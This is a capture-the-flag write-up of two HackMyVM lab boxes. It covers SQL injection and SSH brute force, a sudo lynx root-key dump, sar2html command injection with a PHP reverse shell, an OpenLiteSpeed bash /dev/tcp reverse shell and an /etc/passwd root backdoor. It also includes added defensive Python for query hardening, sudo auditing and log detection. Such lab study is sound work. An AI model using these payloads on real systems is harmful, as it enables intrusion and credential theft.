I’ve done a couple more HackMyVM boxes: Talk and Speed. Talk is Easy rated, Speed is Medium.

Talk

Talk runs a webapp called chatME, which we can find here. Downloading the source, it doesn't appear to have any input sanitisation, so it is probably open to SQLi.

┌──(root💀kali)-[/opt/hackmyvm/talk]
└─# sqlmap -r request --level=2 --risk=2 --batch
# etc
[21:13:27] [INFO] POST parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] Y
[21:13:27] [INFO] testing 'Generic inline queries'
[21:13:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:13:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:13:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[21:13:27] [INFO] checking if the injection point on POST parameter 'id' is a false positive
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 549 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg=id;id&id=1' RLIKE (SELECT (CASE WHEN (4603=4603) THEN 1 ELSE 0x28 END)) AND 'UTLh'='UTLh
---
[21:13:27] [INFO] the back-end DBMS is MySQL
/usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: Unknown is an invalid version and will not be supported in a future release
  warnings.warn(
web application technology: Nginx 1.14.2
back-end DBMS: MySQL Unknown (MariaDB fork)
[21:13:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.66'

[*] ending @ 21:13:27 /2022-01-22/

So, yes. I carry on with sqlmap:

Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+
| userid | email           | phone       | password        | username |
+--------+-----------------+-------------+-----------------+----------+
| 5      | david@david.com | 11          | adrianthebest   | david    |
| 4      | jerry@jerry.com | 111         | thatsmynonapass | jerry    |
| 2      | nona@nona.com   | 1111        | myfriendtom     | nona     |
| 1      | pao@yahoo.com   | 09123123123 | pao             | pao      |
| 3      | tina@tina.com   | 11111       | davidwhatpass   | tina     |
+--------+-----------------+-------------+-----------------+----------+

[21:14:44] [INFO] table 'chat.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.10.66/dump/chat/user.csv'
[21:14:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.66'

[*] ending @ 21:14:44 /2022-01-22/
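As an added example, not chatME's code or anything from the original post, here is what the fix for both findings looks like in Python, with sqlite3 standing in for MySQL: the id lookup written with a bound parameter beside the string-concatenated form sqlmap exploited, and the user table storing salted PBKDF2 hashes instead of the clear-text passwords the dump shows (the hashing scheme, round count and function names are assumptions). Running it, the vulnerable lookup answers differently for a true and a false tail condition, which is exactly the boolean-based blind oracle sqlmap reported, while the bound version matches nothing for either.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import List, Optional

# Work factor for PBKDF2-HMAC-SHA256; an assumed value, not chatME's own scheme.
PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing salted hash instead of the clear-text password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _algo, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    # Constant-time comparison so the check itself leaks nothing about the stored value.
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory copy of the chat.user table from the dump, with hashed passwords."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE user (userid INTEGER, email TEXT, phone TEXT, password TEXT, username TEXT)"
    )
    rows = [
        (5, "david@david.com", "11", "adrianthebest", "david"),
        (4, "jerry@jerry.com", "111", "thatsmynonapass", "jerry"),
        (2, "nona@nona.com", "1111", "myfriendtom", "nona"),
        (1, "pao@yahoo.com", "09123123123", "pao", "pao"),
        (3, "tina@tina.com", "11111", "davidwhatpass", "tina"),
    ]
    con.executemany(
        "INSERT INTO user VALUES (?, ?, ?, ?, ?)",
        [(uid, email, phone, hash_password(pw), name) for uid, email, phone, pw, name in rows],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, userid: str) -> List[str]:
    """The pattern sqlmap found: the request value is pasted into the SQL text."""
    sql = f"SELECT username FROM user WHERE userid = '{userid}'"
    return [row[0] for row in con.execute(sql)]


def lookup_hardened(con: sqlite3.Connection, userid: str) -> List[str]:
    """Same query with a bound parameter: the value can never change the query's structure."""
    return [row[0] for row in con.execute("SELECT username FROM user WHERE userid = ?", (userid,))]


def login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup plus hash verification; no clear-text password ever hits the table."""
    row = con.execute("SELECT password FROM user WHERE username = ?", (username,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = make_db()
    # Boolean-based blind oracle: the vulnerable lookup answers differently for a true and a false condition.
    print(lookup_vulnerable(db, "1' AND '1'='1"), lookup_vulnerable(db, "1' AND '1'='2"))
    # The hardened lookup treats the whole string as a userid and matches nothing either way.
    print(lookup_hardened(db, "1' AND '1'='1"), lookup_hardened(db, "1"))
    print(login(db, "pao", "pao"), login(db, "pao", "wrong"))
```

The second point the dump makes is that even with the injection fixed, a table of clear-text passwords turns one bug into SSH access for every user who reused a password; hashing does not stop reuse, but it means a dump no longer hands over the passwords themselves.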

Privesc etc

┌──(root💀kali)-[/opt/hackmyvm/talk]
└─# hydra -L users -P pass ssh://10.10.10.66
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-22 21:16:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:6/p:5), ~2 tries per task
[DATA] attacking ssh://10.10.10.66:22/
[22][ssh] host: 10.10.10.66   login: nona   password: thatsmynonapass
[22][ssh] host: 10.10.10.66   login: david   password: davidwhatpass
[22][ssh] host: 10.10.10.66   login: jerry   password: myfriendtom
[22][ssh] host: 10.10.10.66   login: adrian   password: adrianthebest
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-22 21:16:57
                                                                                                                                                                    
┌──(root💀kali)-[/opt/hackmyvm/talk]
└─# ssh adrian@10.10.10.66
adrian@10.10.10.66's password: 
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
adrian@talk:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for adrian: 
Sorry, user adrian may not run sudo on talk.
adrian@talk:~$ su jerry
Password: 
jerry@talk:/home/adrian$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jerry: 
Sorry, user jerry may not run sudo on talk.
jerry@talk:/home/adrian$ su david
Password: 
david@talk:/home/adrian$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for david: 
Sorry, user david may not run sudo on talk.
david@talk:/home/adrian$ su nona
Password: 
nona@talk:~$ sudo -l
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx
nona@talk:/home/adrian$ sudo -u root /usr/bin/lynx -dump /root/.ssh/id_rsa > /tmp/id_rsa
nona@talk:/home/adrian$ cd /tmp
nona@talk:/tmp$ chmod 600 id_rsa 
nona@talk:/tmp$ ssh -i id_rsa root@localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:QnewK0l6AphbD9vYMwFTNEGQhVfJ8KlSn1BGwWO1D/Q.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Linux talk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 18 04:34:23 2021
root@talk:~#
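The root on Talk comes down to one sudoers line: NOPASSWD root access to a program that can dump any file is root access. As an added example, not from the post, here is a small Python audit that parses the command section of `sudo -l` output into rules and flags the ones that reach root without a password; the input string is the output above reproduced verbatim, and the rule names and the `SudoRule` type are my own.

```python
import re
from typing import List, NamedTuple


class SudoRule(NamedTuple):
    runas_user: str
    runas_group: str
    nopasswd: bool
    command: str


# The `sudo -l` output for nona above, reproduced here as a constructed string.
SUDO_L_OUTPUT = """\
Matching Defaults entries for nona on talk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User nona may run the following commands on talk:
    (ALL : ALL) NOPASSWD: /usr/bin/lynx
"""

# One rule line: "(user[ : group]) [TAG: ...] cmd[, cmd...]"
RULE_RE = re.compile(
    r"^\s*\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Turn the command section of `sudo -l` output into one SudoRule per command."""
    rules: List[SudoRule] = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = match.group("tags") or ""
        for cmd in match.group("cmds").split(","):
            rules.append(SudoRule(
                runas_user=match.group("user").strip(),
                runas_group=(match.group("group") or "").strip(),
                nopasswd="NOPASSWD:" in tags,
                command=cmd.strip(),
            ))
    return rules


def risky_rules(rules: List[SudoRule]) -> List[SudoRule]:
    """Rules that reach root with no password at all. Whether the program can read or write
    arbitrary files (lynx -dump can) still has to be judged per binary, so every hit is a review item."""
    return [r for r in rules if r.nopasswd and r.runas_user in ("ALL", "root")]


if __name__ == "__main__":
    parsed = parse_sudo_l(SUDO_L_OUTPUT)
    for rule in risky_rules(parsed):
        print("review:", rule)
```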

Speed

Here we had a few extra ports:

┌──(root💀kali)-[/opt/hackmyvm/speed]
└─# nmap -T4 -p22,80,7080,8088 -A 10.10.10.67 -oA nmap/tcp_detail
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 21:26 EST
Nmap scan report for 10.10.10.67
Host is up (0.00030s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:07:9a:67:7f:8a:63:a7:48:46:46:bb:78:83:4e:d5 (RSA)
|   256 5e:9b:35:e4:82:5f:eb:01:9b:6a:7b:cc:5b:16:00:4f (ECDSA)
|_  256 67:85:3b:a2:fb:3b:d0:d0:6b:45:a0:ae:2d:ac:1b:e9 (ED25519)
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
7080/tcp open  ssl/http LiteSpeed httpd
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://10.10.10.67:7080/login.php
| ssl-cert: Subject: commonName=speed/organizationName=webadmin/countryName=US
| Not valid before: 2021-02-17T08:51:38
|_Not valid after:  2023-02-17T08:51:38
|_http-server-header: LiteSpeed
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8088/tcp open  http     LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Welcome
MAC Address: 08:00:27:48:3A:28 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 10.10.10.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.38 seconds

On the main website we had sar2html version 3.2.2, which famously has a command injection exploit in version 3.2.1. On the project's GitHub page, the 3.2.2 release is described as:

sar2html supports Ubuntu 20 now.
minor fixes

Um, ok. Does the command injection still work? Actually, yes:

GET /index.php?plot=;php+-r+'$sock%3dfsockopen("10.10.10.2",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: 10.10.10.67
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=2gk0g046qkm2crb2pi8p9jeqa7; miindex2=1
Upgrade-Insecure-Requests: 1

and

┌──(root💀kali)-[/opt/hackmyvm/speed]
└─# nc -nvlp 1234                                                
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.67] 53314
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@speed:~/html$ sudo -l
sudo -l
bash: sudo: command not found
www-data@speed:~/html$
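For the blue-team side of this, an added example that is not from the original post or from sar2html: a Python scan over nginx access log lines that URL-decodes each query parameter and flags values containing shell metacharacters, which is what the `plot=;php ...` request above looks like on disk. The log lines are constructed; the second one records that request the way nginx would log it (double quotes inside $request are escaped as `\x22`), and the line pattern assumes the stock combined log format.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus, urlsplit

# Constructed nginx "combined" log lines. The second records the request shown above the way
# nginx would write it (double quotes in $request are escaped as \x22).
ACCESS_LOG = r"""
10.10.10.2 - - [22/Jan/2022:21:30:01 -0500] "GET /index.php?plot=cpu HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.10.2 - - [22/Jan/2022:21:30:09 -0500] "GET /index.php?plot=;php+-r+'$sock%3dfsockopen(\x2210.10.10.2\x22,1234)%3bexec(\x22/bin/sh+-i+<%263+>%263+2>%263\x22)%3b' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Characters that separate or substitute commands in sh. A lone '&' is left out so that
# ordinary URL-encoded ampersands inside values do not trip the check.
SHELL_META = re.compile(r"[;|`\n]|\$\(|\$\{")


def parse_query(uri: str) -> List[Tuple[str, str]]:
    """Split the query on literal '&' first, then decode: a '%26' inside a value stays in it."""
    params = []
    for pair in urlsplit(uri).query.split("&"):
        if pair:
            key, _sep, value = pair.partition("=")
            params.append((unquote_plus(key), unquote_plus(value)))
    return params


def find_command_injection(log_text: str) -> List[Dict[str, str]]:
    """Return one hit per (request, parameter) whose decoded value contains shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        for key, value in parse_query(match.group("uri")):
            if SHELL_META.search(value):
                hits.append({
                    "ip": match.group("ip"),
                    "time": match.group("time"),
                    "param": key,
                    "value": value,
                })
    return hits


if __name__ == "__main__":
    for hit in find_command_injection(ACCESS_LOG):
        print(f"{hit['time']} {hit['ip']} param={hit['param']!r} value={hit['value']!r}")
```

Decoding before matching matters: in the raw log the `;` that starts the payload is visible, but the `%3b` separators inside it are not, and a variant that encodes the first `;` as well would slip past a grep on the raw line.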

With this shell we can find credentials for the OpenLiteSpeed 1.5.12 instance running on port 7080.

www-data@speed:/usr/local/lsws$ ls -lash
ls -lash
total 132K
4.0K drwxr-xr-x 22 root   root    4.0K Feb 17  2021 .
4.0K drwxr-xr-x 11 root   root    4.0K Feb 17  2021 ..
4.0K drwxr-xr-x  6 root   root    4.0K Feb 17  2021 Example
 36K -rw-r--r--  1 root   root     35K Feb 17  2021 GPL.txt
4.0K -rw-r--r--  1 root   root       7 Feb 17  2021 VERSION
4.0K drwxr-xr-x  4 root   root    4.0K Feb 17  2021 add-ons
4.0K drwxr-xr-x  9 root   root    4.0K Feb 17  2021 admin
4.0K -rwxrwxrwx  1 root   root      41 Feb 17  2021 adminpasswd
4.0K drwxr-xr-x  2 nobody nogroup 4.0K Jan 23 03:55 autoupdate
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 backup
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 bin
4.0K drwxr-xr-x  2 nobody nogroup 4.0K Feb 17  2021 cachedata
4.0K drwx--x---  2 nobody nogroup 4.0K Jan 22 21:24 cgid
4.0K drwxr-x---  5 lsadm  nogroup 4.0K Feb 17  2021 conf
4.0K drwxr-xr-x  6 root   root    4.0K Feb 17  2021 docs
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 fcgi-bin
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 gdata
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 lib
4.0K drwxr-xr-x  2 root   root    4.0K Jan 22 21:24 logs
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 lsrecaptcha
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 modules
4.0K drwxr-xr-x  2 root   root    4.0K Feb 17  2021 php
4.0K drwx------  2 lsadm  lsadm   4.0K Jan 23 03:55 phpbuild
4.0K drwxr-xr-x  3 root   root    4.0K Feb 17  2021 share
4.0K drwxr-xr-x  3 nobody nogroup 4.0K Feb 17  2021 tmp
www-data@speed:/usr/local/lsws$ cat adminpasswd
cat adminpasswd
WebAdmin user/password is admin/MjE0MGU2
www-data@speed:/usr/local/lsws$

Now we have OpenLiteSpeed 1.5.12. There is an exploit described here for version 1.7.8, but it also works against our version. In the WebAdmin console we go to Server Configuration > External App and edit the only entry, the LiteSpeed SAPI App. In Command we enter our shell with this syntax:

fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/10.10.10.2/1234 0>&1'

and in Run as User and Run as Group we put root. The changes must be saved and a ‘graceful’ restart run to fire the shell. This gets us a shell with GID 0, but not UID 0:

┌──(root💀kali)-[/opt/hackmyvm/speed]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.67] 53350
bash: cannot set terminal process group (26708): Inappropriate ioctl for device
bash: no job control in this shell
nobody@speed:/usr/bin$ id
id
uid=65534(nobody) gid=0(root) groups=0(root)

But with GID 0 we can write to /etc/passwd:

id
uid=65534(nobody) gid=0(root) groups=0(root)
nobody@speed:/usr/bin$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
nobody@speed:/usr/bin$ su root2
su root2
Password: mrcake
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -lash
total 32K
4.0K drwx------  3 root root 4.0K Feb 17  2021 .
4.0K drwxr-xr-x 18 root root 4.0K Feb 17  2021 ..
4.0K -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
4.0K -rwx--x--x  1 root root 1.9K Feb 17  2021 flag.sh
4.0K drwxr-xr-x  3 root root 4.0K Feb 17  2021 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root   18 Feb 17  2021 root.txt
4.0K -rw-r--r--  1 root root   66 Feb 17  2021 .selected_editor

And that’s that.